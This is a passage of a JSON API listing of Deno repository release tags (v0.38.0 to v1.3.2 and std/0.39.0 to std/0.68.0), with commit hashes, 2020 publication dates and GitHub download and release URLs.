ob_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0"